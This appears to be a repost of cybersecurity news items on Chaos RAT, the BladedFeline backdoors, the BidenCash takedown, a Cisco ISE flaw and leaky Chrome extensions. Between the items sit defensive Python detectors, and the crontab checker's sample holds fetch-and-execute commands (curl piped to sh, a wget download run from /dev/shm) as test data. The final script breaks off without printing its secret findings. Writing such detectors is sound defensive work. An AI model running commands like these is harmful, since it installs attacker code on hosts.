Author: Mark

  • Chaos RAT Malware Targets Windows and Linux via Fake Network Tool Downloads

Jun 04, 2025 | Ravie Lakshmanan | Linux / Malware


    Threat hunters are calling attention to a new variant of a remote access trojan (RAT) called Chaos RAT that has been used in recent attacks targeting Windows and Linux systems.

    According to findings from Acronis, the malware artifact may have been distributed by tricking victims into downloading a network troubleshooting utility for Linux environments.

    “Chaos RAT is an open-source RAT written in Golang, offering cross-platform support for both Windows and Linux systems,” security researchers Santiago Pontiroli, Gabor Molnar, and Kirill Antonenko said in a report shared with The Hacker News.

    “Inspired by popular frameworks such as Cobalt Strike and Sliver, Chaos RAT provides an administrative panel where users can build payloads, establish sessions, and control compromised machines.”

    While work on the “remote administration tool” started way back in 2017, it did not attract attention until December 2022, when it was put to use in a malicious campaign targeting public-facing web applications hosted on Linux systems with the XMRig cryptocurrency miner.


    Once installed, the malware connects to an external server and awaits commands that allow it to launch reverse shells, upload/download/delete files, enumerate files and directories, take screenshots, gather system information, lock/restart/shutdown the machine, and open arbitrary URLs. The latest version of Chaos RAT is 5.0.3, which was released on May 31, 2024.

    Acronis said that the Linux variants of the malware have since been detected in the wild, often in connection with cryptocurrency mining campaigns. The attack chains observed by the company show that Chaos RAT is distributed to victims via phishing emails containing malicious links or attachments.

    These artifacts are designed to drop a malicious script that can modify the task scheduler “/etc/crontab” to fetch the malware periodically as a way of setting up persistence.
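The crontab persistence described above is cheap to hunt for on a Linux host. The following checker is an added example, not code from the Acronis report or from Chaos RAT: it reads text in system-crontab format (five schedule fields, a user, a command) and reports commands that download with curl or wget and hand the result to a shell, or that stage and execute files from world-writable directories. The sample crontab is constructed, and 203.0.113.10 is a documentation address.

```python
"""Flag /etc/crontab entries that periodically fetch and run remote content.

Added example (not from the Acronis report or Chaos RAT). The sample crontab
below is constructed for illustration.
"""
import re

# System crontab: five schedule fields, then the user, then the command.
_CRON_LINE = re.compile(r"^\s*(?P<sched>(?:\S+\s+){5})(?P<user>\S+)\s+(?P<cmd>.+?)\s*$")
_ASSIGNMENT = re.compile(r"^\w+=")
_FETCHER = re.compile(r"\b(?:curl|wget|fetch)\b")
_REMOTE = re.compile(r"\b(?:https?|ftp)://|\b\d{1,3}(?:\.\d{1,3}){3}\b")
_PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:/bin/|/usr/bin/)?(?:sh|bash|dash|zsh|ksh)\b")
_STAGING_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def parse_crontab(text):
    """Yield (user, command) for every schedule line, skipping comments and VAR=value lines."""
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#") or _ASSIGNMENT.match(stripped):
            continue
        match = _CRON_LINE.match(line)
        if match:
            yield match.group("user"), match.group("cmd")


def classify(cmd):
    """Return the reasons a command looks like fetch-and-execute persistence (empty if none)."""
    reasons = []
    fetches_remote = bool(_FETCHER.search(cmd)) and bool(_REMOTE.search(cmd))
    if fetches_remote and _PIPE_TO_SHELL.search(cmd):
        reasons.append("remote content piped straight into a shell")
    elif fetches_remote and ("&&" in cmd or ";" in cmd):
        reasons.append("download followed by further commands, likely executing it")
    if any(d in cmd for d in _STAGING_DIRS):
        reasons.append("uses a world-writable staging directory")
    return reasons


def suspicious_entries(text):
    """Return [(user, command, reasons)] for crontab entries with at least one reason."""
    found = []
    for user, cmd in parse_crontab(text):
        reasons = classify(cmd)
        if reasons:
            found.append((user, cmd, reasons))
    return found


# Constructed sample: two stock distribution entries plus two persistence entries.
SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab (constructed sample)
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/10 *  * * *   root    curl -fsSL http://203.0.113.10/update.sh | sh
0 */6   * * *   www-data wget -q http://203.0.113.10/na -O /dev/shm/.na && chmod +x /dev/shm/.na && /dev/shm/.na
"""

if __name__ == "__main__":
    for user, cmd, reasons in suspicious_entries(SAMPLE_CRONTAB):
        print(f"[{user}] {cmd}\n    -> {'; '.join(reasons)}")
```

Run it against /etc/crontab and the files under /etc/cron.d on a suspect host; per-user crontabs (crontab -l) use the same layout without the user field, so drop one `\S+\s+` group from the regex for those.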


    “Early campaigns used this technique to deliver cryptocurrency miners and Chaos RAT separately, indicating that Chaos was primarily employed for reconnaissance and information gathering on compromised devices,” the researchers said.

    An analysis of a recent sample uploaded to VirusTotal in January 2025 from India with the name “NetworkAnalyzer.tar.gz,” has raised the possibility that users are being deceived into downloading the malware by masquerading it as a network troubleshooting utility for Linux environments.

    Furthermore, the admin panel that allows users to build payloads and manage infected machines has been found to be susceptible to a command injection vulnerability (CVE-2024-30850, CVSS score: 8.8) that could be combined with a cross-site scripting flaw (CVE-2024-31839, CVSS score: 4.8) to execute arbitrary code on the server with elevated privileges. Both the vulnerabilities have since been addressed by Chaos RAT’s maintainer as of May 2024.

    While it’s currently not clear who is behind the use of Chaos RAT in real-world attacks, the development once again illustrates how threat actors continue to weaponize open-source tools to their advantage and confuse attribution efforts.


    “What starts as a developer’s tool can quickly become a threat actor’s instrument of choice,” the researchers said. “Using publicly available malware helps APT groups blend into the noise of everyday cybercrime. Open-source malware offers a ‘good enough’ toolkit that can be quickly customized and deployed. When multiple actors use the same open-source malware, it muddles the waters of attribution.”

    The disclosure coincides with the emergence of a new campaign that’s targeting Trust Wallet users on desktop with counterfeit versions that are distributed via deceptive download links, phishing emails, or bundled software with the goal of harvesting browser credentials, extracting data from desktop-based wallets and browser extensions, executing commands, and acting as a clipper malware.

    “Once installed, the malware can scan for wallet files, intercept clipboard data, or monitor browser sessions to capture seed phrases or private keys,” Point Wild researcher Kedar S Pandit said in a report published this week.

    Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.


    Source: thehackernews.com…

  • Iran-Linked BladedFeline Hits Iraqi and Kurdish Targets with Whisper and Spearal Malware


    An Iran-aligned hacking group has been attributed to a new set of cyber attacks targeting Kurdish and Iraqi government officials in early 2024.

    The activity is tied to a threat group ESET tracks as BladedFeline, which is assessed with medium confidence to be a sub-cluster within OilRig, a known Iranian nation-state cyber actor. It’s said to be active since September 2017, when it targeted officials associated with the Kurdistan Regional Government (KRG).

    “This group develops malware for maintaining and expanding access within organizations in Iraq and the KRG,” the Slovak cybersecurity company said in a technical report shared with The Hacker News.

    “BladedFeline has worked consistently to maintain illicit access to Kurdish diplomatic officials, while simultaneously exploiting a regional telecommunications provider in Uzbekistan, and developing and maintaining access to officials in the government of Iraq.”

    BladedFeline was first documented by ESET in May 2024 as part of its APT Activity Report Q4 2023–Q1 2024, detailing the adversary’s attack on a governmental organization from the Kurdistan region of Iraq and its targeting of the Uzbekistan telecom provider that may have been compromised as early as May 2022.


    The group was discovered in 2023 following attacks aimed at Kurdish diplomatic officials with Shahmaran, a simple backdoor that checks in with a remote server and executes any operator-provided commands on the infected host to upload or download files, request specific file attributes, and provide a file and directory manipulation API.

    Then last November, the cybersecurity firm said it observed the hacking crew orchestrating attacks against Iran’s neighbors, particularly regional and government entities in Iraq and diplomatic envoys from Iraq to various countries, using bespoke backdoors like Whisper (aka Veaty), Spearal, and Optimizer.

    “BladedFeline has invested heavily in gathering diplomatic and financial information from Iraqi organizations, indicating that Iraq plays a large part in the strategic objectives of the Iranian government,” ESET noted in November 2024. “Additionally, governmental organizations in Azerbaijan have been another focus of BladedFeline.”

    While the exact initial access vector used to get into KRG victims is unclear, it’s suspected that the threat actors likely leveraged a vulnerability in an internet-facing application to break into Iraqi government networks and deploy the Flog web shell to maintain persistent remote access.

    The inner workings of the Whisper backdoor

    The wide range of backdoors highlights BladedFeline’s commitment to refining its malware arsenal. Whisper is a C#/.NET backdoor that logs into a compromised webmail account on a Microsoft Exchange server and uses it to communicate with the attackers via email attachments. Spearal is a .NET backdoor that utilizes DNS tunneling for command-and-control communication.
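DNS tunnelling of the kind Spearal uses leaves a statistical footprint in resolver logs regardless of the exact encoding: many distinct, long, high-entropy subdomains under a single registered domain, often as TXT or NULL queries. The scorer below is an added example and is not ESET's detection logic, nor is it tied to Spearal's real encoding. It aggregates queries per registered domain and flags the ones whose subdomain labels look like encoded data. The log lines are constructed, and approximating the registered domain as the last two labels (with no public-suffix list) is an assumption.

```python
"""Score DNS query logs for tunnelling-style C2 traffic.

Added example (not ESET's logic). Log lines are constructed; the registered
domain is approximated as the last two labels, which is an assumption.
"""
import math
from collections import defaultdict


def shannon_entropy(s):
    """Bits per character of the string s."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname):
    """Return (subdomain_part_or_None, registered_domain) for a query name."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) < 3:
        return None, ".".join(labels)
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def parse_log(text):
    """Parse 'timestamp client qname qtype' lines; malformed lines are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4:
            rows.append(tuple(parts))
    return rows


def score_domains(rows, min_queries=5):
    """Aggregate per registered domain; domains with fewer than min_queries are dropped."""
    acc = defaultdict(lambda: {"queries": 0, "subs": set(), "len": 0, "entropy": 0.0, "txt": 0})
    for _, _, qname, qtype in rows:
        sub, reg = split_name(qname)
        a = acc[reg]
        a["queries"] += 1
        if qtype in ("TXT", "NULL"):
            a["txt"] += 1
        if sub:
            a["subs"].add(sub)
            a["len"] += len(sub)
            a["entropy"] += shannon_entropy(sub.replace(".", ""))
    stats = {}
    for reg, a in acc.items():
        n = a["queries"]
        if n < min_queries:
            continue
        stats[reg] = {
            "queries": n,
            "unique_subdomains": len(a["subs"]),
            "avg_subdomain_len": a["len"] / n,
            "avg_entropy": a["entropy"] / n,
            "txt_ratio": a["txt"] / n,
        }
    return stats


def flag_tunneling(stats, min_len=30, min_entropy=3.5, min_unique_ratio=0.8):
    """Registered domains whose subdomains are long, high-entropy and rarely repeated."""
    flagged = []
    for reg, s in stats.items():
        unique_ratio = s["unique_subdomains"] / s["queries"]
        if (s["avg_subdomain_len"] >= min_len and s["avg_entropy"] >= min_entropy
                and unique_ratio >= min_unique_ratio):
            flagged.append(reg)
    return sorted(flagged)


# Constructed log: ordinary lookups plus six TXT queries whose 32-character
# labels are permutations of the base32 alphabet (entropy exactly 5 bits/char).
SAMPLE_LOG = """\
2024-12-02T08:01:10Z 10.0.0.5 www.example.com A
2024-12-02T08:01:12Z 10.0.0.5 mail.example.com A
2024-12-02T08:02:03Z 10.0.0.7 www.example.com A
2024-12-02T08:02:40Z 10.0.0.7 api.example.com A
2024-12-02T08:03:15Z 10.0.0.5 www.example.com A
2024-12-02T08:03:50Z 10.0.0.9 mail.example.com A
2024-12-02T08:04:00Z 10.0.0.9 example.org A
2024-12-02T08:05:01Z 10.0.0.12 a2b3c4d5e6f7ghijklmnopqrstuvwxyz.dns-c2.example TXT
2024-12-02T08:05:31Z 10.0.0.12 zyxwvutsrqponmlkjihgfedcba765432.dns-c2.example TXT
2024-12-02T08:06:01Z 10.0.0.12 7g6h5i4j3k2lmnopqrstuvwxyzabcdef.dns-c2.example TXT
2024-12-02T08:06:31Z 10.0.0.12 nopqrstuvwxyz234567abcdefghijklm.dns-c2.example TXT
2024-12-02T08:07:01Z 10.0.0.12 k3m5o7q2s4u6wyacegibdfhjlnprtvxz.dns-c2.example TXT
2024-12-02T08:07:31Z 10.0.0.12 bdfhjlnprtvxz2a4c6e3g5i7kmoqsuwy.dns-c2.example TXT
"""

if __name__ == "__main__":
    stats = score_domains(parse_log(SAMPLE_LOG))
    for reg in flag_tunneling(stats):
        print(reg, stats[reg])
```

The thresholds are starting points: CDNs and some telemetry services also generate long unique labels, so in production pair the score with domain age, resolver NXDOMAIN rates and the TXT ratio before alerting.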

    “Optimizer is an iterative update on the Spearal backdoor. It uses the same workflow and offers the same features. The main differences between Spearal and Optimizer are largely cosmetic,” the ESET research team told The Hacker News.

    Select attacks observed in December 2023 have also involved the deployment of a Python implant referred to as Slippery Snakelet that comes with limited capabilities to execute commands via “cmd.exe,” download files from an external URL, and upload files.

The backdoors notwithstanding, BladedFeline is notable for its use of tunneling tools such as Laret and Pinar to maintain access to target networks. Also put to use is a malicious IIS module dubbed PrimeCache, which ESET said bears similarities to the RDAT backdoor used by OilRig.

    A passive backdoor, PrimeCache works by keeping an eye out for incoming HTTP requests matching a predefined cookie header structure in order to process commands issued by the attacker and exfiltrate files.


This overlap, coupled with the fact that two of OilRig’s tools, RDAT and a reverse shell codenamed VideoSRV, were discovered on a compromised KRG system in September 2017 and January 2018, respectively, has led ESET to assess that BladedFeline is likely a subgroup within OilRig, distinct from Lyceum, a moniker assigned to a different sub-cluster.

The OilRig connection is also reinforced by a September 2024 report from Check Point, which attributed to the Iranian hacking group the infiltration of Iraqi government networks and their infection with Whisper and Spearal, likely through social engineering.

    ESET said it identified a malicious artifact named Hawking Listener that was uploaded to the VirusTotal platform in March 2024 by the same party that uploaded Flog. Hawking Listener is an early-stage implant that listens on a specified port to run commands through “cmd.exe.”

    “BladedFeline is targeting the KRG and the GOI for cyber espionage purposes, with an eye toward maintaining strategic access to high-ranking officials in both governmental entities,” the company concluded.

    “The KRG’s diplomatic relationship with Western nations, coupled with the oil reserves in the Kurdistan region, makes it an enticing target for Iran-aligned threat actors to spy on and potentially manipulate. In Iraq, these threat actors are most probably trying to counter the influence of Western governments following the U.S. invasion and occupation of the country.”



    Source: thehackernews.com…

  • DoJ Seizes 145 Domains Tied to BidenCash Carding Marketplace in Global Takedown

Jun 05, 2025 | Ravie Lakshmanan | Dark Web / Law Enforcement

    The U.S. Department of Justice (DoJ) on Wednesday announced the seizure of cryptocurrency funds and about 145 clearnet and dark web domains associated with an illicit carding marketplace called BidenCash.

    “The operators of the BidenCash marketplace use the platform to simplify the process of buying and selling stolen credit cards and associated personal information,” the DoJ said. “BidenCash administrators charged a fee for every transaction conducted on the website.”

    BidenCash launched in March 2022 to fill the void left by the shutdown of Joker’s Stash a year earlier and several other carding forums like UniCC.

    Since the time it went operational, the illegal bazaar (“bidencash[.]asia,” “bidencash[.]bd,” and “bidencash[.]ws”) is estimated to have supported more than 117,000 customers, facilitated the trafficking of over 15 million payment card numbers and personally identifiable information, and generated no less than $17 million in revenue.


    Specifically, the platform published 3.3 million individual stolen credit cards for free to promote the use of their services between October 2022 and February 2023. The stolen data contained credit card numbers, expiration dates, Card Verification Value (CVV) numbers, account holder names, addresses, email addresses, and phone numbers.

    Of the 2.1 million compromised credit cards released in February 2023, 50% of the cards belonged to U.S.-based people or entities, according to Flashpoint.

    BidenCash also specialized in the sale of compromised credentials that could then be purchased by other criminal actors to obtain access to computers without authorization.

In a report published in May 2023, CloudSEK revealed that BidenCash had begun advertising SSH access to compromised servers for as little as $2, alongside a package of checks that verified whether the target server offered a shell and reported its processing power, location, and security vulnerabilities, if any.

    “This poses a significant risk as threat actors can leverage this power to conduct a wide range of malicious activities, such as data exfiltration, brute force and ransomware attacks, and cryptocurrency mining,” the cybersecurity company said at the time.

Authorities did not disclose the value of the confiscated cryptocurrency funds, nor did they identify the operators of BidenCash or their physical locations.

    The crackdown on BidenCash, according to the seizure banner, is part of an international effort led by the U.S. Secret Service and the Federal Bureau of Investigation (FBI), in partnership with the Dutch Politie, the Shadowserver Foundation, and Searchlight Cyber.


    The development comes days after a multinational law enforcement operation confiscated four domains that offered counter-antivirus (CAV) and crypting services to threat actors to ensure that their malicious software stayed undetected from security software.

It also follows the arrest of a 35-year-old Ukrainian national who is alleged to have broken into more than 5,000 customer accounts at an unnamed hosting company to illicitly mine cryptocurrency on the hacked servers. The individual, who has not been named, faces up to 15 years in prison.

    The defendant is said to have used open-source intelligence to find and breach the vulnerable infrastructure of various international organizations and then deploy virtual machines to conduct unauthorized cryptojacking, resulting in $4.5 million in damages. The threat actor is believed to have been active since at least 2018.



    Source: thehackernews.com…

  • Critical Cisco ISE Auth Bypass Flaw Impacts Cloud Deployments on AWS, Azure, and OCI

Jun 05, 2025 | Ravie Lakshmanan | Network Security / Vulnerability


    Cisco has released security patches to address a critical security flaw impacting the Identity Services Engine (ISE) that, if successfully exploited, could allow unauthenticated actors to carry out malicious actions on susceptible systems.

    The security defect, tracked as CVE-2025-20286, carries a CVSS score of 9.9 out of 10.0. It has been described as a static credential vulnerability.

    “A vulnerability in Amazon Web Services (AWS), Microsoft Azure, and Oracle Cloud Infrastructure (OCI) cloud deployments of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to access sensitive data, execute limited administrative operations, modify system configurations, or disrupt services within the impacted systems,” the company said in an advisory.

    The networking equipment maker, which credited Kentaro Kawane of GMO Cybersecurity for reporting the flaw, noted it’s aware of the existence of a proof-of-concept (PoC) exploit. There is no evidence that it has been maliciously exploited in the wild.


    Cisco said the issue stems from the fact that credentials are improperly generated when Cisco ISE is being deployed on cloud platforms, causing different deployments to share the same credentials as long as the software release and cloud platform are the same.

    Put differently, the static credentials are specific to each release and platform, but are not valid across platforms. As the company highlights, all instances of Cisco ISE release 3.1 on AWS will have the same static credentials.

    However, credentials that are valid for access to a release 3.1 deployment would not be valid to access a release 3.2 deployment on the same platform. Furthermore, Release 3.2 on AWS would not have the same credentials as Release 3.2 on Azure.

Successful exploitation of the vulnerability could permit an attacker to extract the user credentials from one Cisco ISE cloud deployment and then use them to access Cisco ISE deployed in other cloud environments of the same release and platform through unsecured ports.

    This could ultimately allow unauthorized access to sensitive data, execution of limited administrative operations, changes to system configurations, or service disruptions. That said, Cisco ISE is only affected in cases where the Primary Administration node is deployed in the cloud. Primary Administration nodes that are on-premises are not impacted.


    The following versions are affected –

    • AWS – Cisco ISE 3.1, 3.2, 3.3, and 3.4
    • Azure – Cisco ISE 3.2, 3.3, and 3.4
    • OCI – Cisco ISE 3.2, 3.3, and 3.4

    While there are no workarounds to address CVE-2025-20286, Cisco is recommending that users restrict traffic to authorized administrators or run the “application reset-config ise” command to reset user passwords to a new value. However, it bears noting that running the command will reset Cisco ISE to the factory configuration.
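Because the shared credentials are only usable over network paths that reach the Primary Administration node, the "restrict traffic to authorized administrators" advice comes down to the cloud security group in front of it. The audit below is an added example and is not Cisco's code or wording: it takes a security group in the shape returned by `aws ec2 describe-security-groups` (the sample group is constructed), reports administration ports reachable from outside a trusted range, and builds a replacement ingress list. The port set (SSH, the HTTPS admin and portal ports, and the ERS API port) is an assumption for this illustration; confirm it against your own deployment's port requirements.

```python
"""Audit cloud security-group ingress for a Cisco ISE Primary Administration node.

Added example (not Cisco's code). The management port set below is assumed for
the illustration; the sample security group is constructed.
"""
import ipaddress

ADMIN_PORTS = {22, 443, 8443, 9060}      # assumed management ports
WORLD = {"0.0.0.0/0", "::/0"}


def _admin_ports_in(perm):
    """Admin ports covered by one IpPermissions entry ('-1' means every protocol and port)."""
    if perm.get("IpProtocol") == "-1":
        return set(ADMIN_PORTS)
    lo, hi = perm.get("FromPort"), perm.get("ToPort")
    if lo is None or hi is None:
        return set()
    return {p for p in ADMIN_PORTS if lo <= p <= hi}


def _cidrs(perm):
    return ([r["CidrIp"] for r in perm.get("IpRanges", [])]
            + [r["CidrIpv6"] for r in perm.get("Ipv6Ranges", [])])


def find_exposures(group, trusted_cidrs):
    """Return sorted [(port, cidr)] for admin ports reachable from outside trusted_cidrs."""
    trusted = [ipaddress.ip_network(c) for c in trusted_cidrs]
    findings = []
    for perm in group.get("IpPermissions", []):
        ports = _admin_ports_in(perm)
        if not ports:
            continue
        for cidr in _cidrs(perm):
            net = ipaddress.ip_network(cidr)
            covered = any(net.version == t.version and net.subnet_of(t) for t in trusted)
            if cidr in WORLD or not covered:
                findings.extend((p, cidr) for p in ports)
    return sorted(findings)


def hardened_permissions(trusted_cidrs):
    """Replacement ingress list: each admin port only from the trusted ranges."""
    v4 = [{"CidrIp": c} for c in trusted_cidrs if ipaddress.ip_network(c).version == 4]
    v6 = [{"CidrIpv6": c} for c in trusted_cidrs if ipaddress.ip_network(c).version == 6]
    return [{"IpProtocol": "tcp", "FromPort": p, "ToPort": p, "IpRanges": v4, "Ipv6Ranges": v6}
            for p in sorted(ADMIN_PORTS)]


# Constructed sample group: HTTPS open to the world, SSH limited to an admin
# range, RADIUS from the corporate network, and an all-traffic IPv6 rule.
TRUSTED_ADMIN_CIDRS = ["203.0.113.0/24", "2001:db8:1::/48"]
SAMPLE_GROUP = {
    "GroupId": "sg-0123456789abcdef0",
    "GroupName": "ise-pan-example",
    "IpPermissions": [
        {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443,
         "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": []},
        {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22,
         "IpRanges": [{"CidrIp": "203.0.113.0/24"}], "Ipv6Ranges": []},
        {"IpProtocol": "udp", "FromPort": 1812, "ToPort": 1813,
         "IpRanges": [{"CidrIp": "10.0.0.0/8"}], "Ipv6Ranges": []},
        {"IpProtocol": "-1", "IpRanges": [], "Ipv6Ranges": [{"CidrIpv6": "::/0"}]},
    ],
}

if __name__ == "__main__":
    for port, cidr in find_exposures(SAMPLE_GROUP, TRUSTED_ADMIN_CIDRS):
        print(f"admin port {port} reachable from {cidr}")
```

Note that RADIUS and TACACS+ from the enterprise network are left alone: the point is to fence off the administration plane, not the policy-service traffic the node exists to serve. The same check applies to Azure network security groups and OCI security lists once their rule objects are mapped into the same shape.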



    Source: thehackernews.com…

  • Popular Chrome Extensions Leak API Keys, User Data via HTTP and Hard-Coded Credentials

    Cybersecurity researchers have flagged several popular Google Chrome extensions that have been found to transmit data in HTTP and hard-code secrets in their code, exposing users to privacy and security risks.

    “Several widely used extensions […] unintentionally transmit sensitive data over simple HTTP,” Yuanjing Guo, a security researcher in the Symantec’s Security Technology and Response team, said. “By doing so, they expose browsing domains, machine IDs, operating system details, usage analytics, and even uninstall information, in plaintext.”

    The fact that the network traffic is unencrypted also means that they are susceptible to adversary-in-the-middle (AitM) attacks, allowing malicious actors on the same network such as a public Wi-Fi to intercept and, even worse, modify this data, which could lead to far more serious consequences.


The list of identified extensions is below –

    • SEMRush Rank (extension ID: idbhoeaiokcojcgappfigpifhpkjgmab) and PI Rank (ID: ccgdboldgdlngcgfdolahmiilojmfndl), which call the URL “rank.trellian[.]com” over plain HTTP
    • Browsec VPN (ID: omghfjlpggmjjaagoclmmobgdodcjboh), which uses HTTP to call an uninstall URL at “browsec-uninstall.s3-website.eu-central-1.amazonaws[.]com” when a user attempts to uninstall the extension
    • MSN New Tab (ID: lklfbkdigihjaaeamncibechhgalldgl) and MSN Homepage, Bing Search & News (ID: midiombanaceofjhodpdibeppmnamfcj), which transmit a unique machine identifier and other details over HTTP to “g.ceipmsn[.]com”
    • DualSafe Password Manager & Digital Vault (ID: lgbjhdkjmpgjgcbcdlhkokkckpjmedgc), which constructs an HTTP-based URL request to “stats.itopupdate[.]com” along with information about the extension version, user’s browser language, and usage “type”

    “Although credentials or passwords do not appear to be leaked, the fact that a password manager uses unencrypted requests for telemetry erodes trust in its overall security posture,” Guo said.

    Symantec said it also identified another set of extensions with API keys, secrets, and tokens directly embedded in the JavaScript code, which an attacker could weaponize to craft malicious requests and carry out various malicious actions –

    • Online Security & Privacy extension (ID: gomekmidlodglbbmalcneegieacbdmki), AVG Online Security (ID: nbmoafcmbajniiapeidgficgifbfmjfo), Speed Dial [FVD] – New Tab Page, 3D, Sync (ID: llaficoajjainaijghjlofdfmbjpebpa), and SellerSprite – Amazon Research Tool (ID: lnbmbgocenenhhhdojdielgnmeflbnfb), which expose a hard-coded Google Analytics 4 (GA4) API secret that an attacker could use to bombard the GA4 endpoint and corrupt metrics
    • Equatio – Math Made Digital (ID: hjngolefdpdnooamgdldlkjgmdcmcjnc), which embeds a Microsoft Azure API key used for speech recognition that an attacker could use to inflate the developer’s costs or exhaust their usage limits
    • Awesome Screen Recorder & Screenshot (ID: nlipoenfbbikpbjkfpfillcgkoblgpmj) and Scrolling Screenshot Tool & Screen Capture (ID: mfpiaehgjbbfednooihadalhehabhcjo), which expose the developer’s Amazon Web Services (AWS) access key used to upload screenshots to the developer’s S3 bucket
    • Microsoft Editor – Spelling & Grammar Checker (ID: gpaiobkfhnonedkhhfjpmhdalgeoebfa), which exposes a telemetry key named “StatsApiKey” to log user data for analytics
    • Antidote Connector (ID: lmbopdiikkamfphhgcckcjhojnokgfeo), which incorporates a third-party library called InboxSDK that contains hard-coded credentials, including API keys.
    • Watch2Gether (ID: cimpffimgeipdhnhjohpbehjkcdpjolg), which exposes a Tenor GIF search API key
    • Trust Wallet (ID: egjidjbpglichdcondbcbdnbeeppgdph), which exposes an API key associated with the Ramp Network, a Web3 platform that offers wallet developers a way to let users buy or sell crypto directly from the app
    • TravelArrow – Your Virtual Travel Agent (ID: coplmfnphahpcknbchcehdikbdieognn), which exposes a geolocation API key when making queries to “ip-api[.]com”

Attackers who find these keys could weaponize them to drive up API costs, host illegal content, send spoofed telemetry data, and mimic cryptocurrency transaction orders, some of which could get the developer’s account banned.

    Adding to the concern, Antidote Connector is just one of over 90 extensions that use InboxSDK, meaning the other extensions are susceptible to the same problem. The names of the other extensions were not disclosed by Symantec.

Equatio, in a statement shared with The Hacker News, said the Azure API key in question is scoped, rate-limited, and capped at a small USD value per month, so that any abuse affects only the developer.

    “This risk was logged in our ISO27001 risk-register at the time of development, and marked as “accepted” given the limited scope,” Ryan Graham, chief technology officer at Everway, said. “The feature is used by just 6 users out of 670,000 (in the last 90 days). No user data is exposed or stored, and the function is solely used by the Microsoft Edge version of the extension.”


    Trust Wallet also confirmed with the publication that the API key referenced is used only for non-sensitive quote requests and cannot be used to access or expose user data. “It serves solely to identify transactions conducted by partners on Ramp’s platform,” a spokesperson for the security team said.

    Ramp Network further noted that the API key used in Trust Wallet is not “secret information” and that its leakage does not affect user data confidentiality or integrity. It allows for the “identification of which partner was used by the customer to buy or sell a crypto asset,” it added.

    “From GA4 analytics secrets to Azure speech keys, and from AWS S3 credentials to Google-specific tokens, each of these snippets demonstrates how a few lines of code can jeopardize an entire service,” Guo said. “The solution: never store sensitive credentials on the client side.”

    Developers are recommended to switch to HTTPS whenever they send or receive data, store credentials securely in a backend server using a credentials management service, and regularly rotate secrets to further minimize risk.
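Both classes of finding, plaintext HTTP endpoints and client-side secrets, can be caught with a static pass over the unpacked extension before it ships. The scanner below is an added example and is not Symantec's tooling: it reports http:// URLs (the traffic an on-path attacker on shared Wi-Fi can read or rewrite) and credential patterns that should never be in a browser bundle, redacting the values it finds. The JavaScript sample is constructed; the AWS key values are the placeholder keys from AWS's own documentation, the hostnames use reserved example domains, and the pattern set is a starting point rather than a complete secret-detection ruleset.

```python
"""Static scan of a browser-extension bundle for plaintext HTTP endpoints and embedded secrets.

Added example (not Symantec's tooling). The JavaScript sample is constructed
and uses AWS's documented placeholder keys and reserved example hostnames.
"""
import re

HTTP_URL = re.compile(r"""["'`](http://[^"'`\s]+)["'`]""")
SECRET_PATTERNS = {
    # AWS access key IDs are 'AKIA' followed by 16 upper-case alphanumerics.
    "aws_access_key_id": re.compile(r"\b(AKIA[0-9A-Z]{16})\b"),
    # A 40-character value assigned to a name such as secretAccessKey / aws_secret_key.
    "aws_secret_access_key": re.compile(
        r"""(?i)secret[_a-z]*key["']?\s*[:=]\s*["']([A-Za-z0-9/+=]{40})["']"""),
    # GA4 Measurement Protocol calls carry the api_secret as a query parameter.
    "ga4_api_secret": re.compile(r"api_secret=([A-Za-z0-9_\-]{10,})"),
    # Azure Cognitive Services keys travel in the Ocp-Apim-Subscription-Key header.
    "azure_subscription_key": re.compile(
        r"""Ocp-Apim-Subscription-Key["']?\s*[:=]\s*["']([0-9a-f]{32})["']"""),
    "generic_api_key": re.compile(
        r"""(?i)\b(?:api[_-]?key|apikey|token)["']?\s*[:=]\s*["']([A-Za-z0-9_\-]{16,})["']"""),
}
# XML namespace URIs are identifiers, not network calls, so they are not findings.
IGNORED_HTTP_HOSTS = ("localhost", "127.0.0.1", "www.w3.org")


def find_http_urls(source):
    """Return the plaintext http:// URL literals in the source, in order of appearance."""
    urls = []
    for m in HTTP_URL.finditer(source):
        url = m.group(1)
        host = url[len("http://"):].split("/", 1)[0].split(":", 1)[0]
        if host not in IGNORED_HTTP_HOSTS:
            urls.append(url)
    return urls


def find_secrets(source):
    """Return [(kind, line_no, redacted_value)] for every secret pattern that matches."""
    hits = []
    for kind, pattern in SECRET_PATTERNS.items():
        for m in pattern.finditer(source):
            line_no = source.count("\n", 0, m.start()) + 1
            value = m.group(1)
            hits.append((kind, line_no, value[:4] + "*" * (len(value) - 4)))
    return hits


def scan(source):
    return {"http_urls": find_http_urls(source), "secrets": find_secrets(source)}


# Constructed background-script fragment showing both problem classes.
SAMPLE_JS = r'''
// constructed background.js fragment for this example
const TELEMETRY = "http://stats.example.net/collect?v=" + chrome.runtime.getManifest().version;
const UNINSTALL_URL = "http://uninstall.example.net/bye";
const GA4 = "https://www.google-analytics.com/mp/collect?measurement_id=G-XXXXXXX&api_secret=abcDEF123456789";
const s3 = new AWS.S3({
  accessKeyId: "AKIAIOSFODNN7EXAMPLE",
  secretAccessKey: "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
});
fetch("https://eastus.api.cognitive.microsoft.com/sts/v1.0/issueToken", {
  method: "POST",
  headers: { "Ocp-Apim-Subscription-Key": "0123456789abcdef0123456789abcdef" },
});
const xmlns = "http://www.w3.org/2000/svg";
'''

if __name__ == "__main__":
    report = scan(SAMPLE_JS)
    for url in report["http_urls"]:
        print("plaintext HTTP:", url)
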